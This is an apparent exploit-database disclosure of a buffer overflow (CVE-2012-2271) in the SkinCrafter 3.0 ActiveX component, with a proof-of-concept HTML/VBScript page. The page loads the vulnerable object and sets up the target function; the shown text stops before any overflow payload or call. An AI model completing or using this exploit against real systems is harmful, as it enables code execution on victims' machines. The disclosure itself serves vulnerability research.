# Software : SkinCrafter from NMSoft Technologies
# Version : SkinCrafter version 3.0
# Title : Buffer overflow in skincrafter3_vs2005.dll of skinCrafter vs3.0
# Link : http://www.skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip
# Date : May 17, 2012
# Tested on : XP SP2
# The vulnerability lies in the COM component used by the product SkinCrafter
# from DMSoft Technologies(http://www.dmsofttech.com/projects.html). This COM
# component, SkinCrafter3_vs2005.dll, implememnts a function InitLicenKeys,
# whose parameter is not checked for the bounds, hence leading to the
# overflow condition
====
POC:
====
<html>
Exploit !!!!!!!!!!!!!!!!!!!!!!!!!
<object classid='clsid:B9D38E99-5F6E-4C51-8CFD-507804387AE9' id='target' ></object>
<script language='vbscript'>
'Exploit title: Buffer overflow in skincrafter3_vs2005.dll of skinCrafter vs3.0
'Date: May 17, 2012
'author: Saurabh Sharma(HCL Technologies) sharma_saurabh@hcl.com
'Software Link: http://www.skincrafter.com/downloads/SkinCrafter_Demo_2005_2008_x86.zip
'version: SkinCrafter version 3.0
'Tested on : XP SP2
'CVE-2012-2271
targetFile = "C:\Program Files\SkinCrafter3\SkinCrafterDemo\SkinCrafterActiveX\SkinCrafter3_vs2005.dll"
prototype = "Sub InitLicenKeys ( ByVal reg_name As String , ByVal company As String , ByVal email As String , ByVal licenkey As String )"
memberName = "InitLicenKeys"
progid = "SKINCRAFTERLib.SCSkin3"
argCount = 4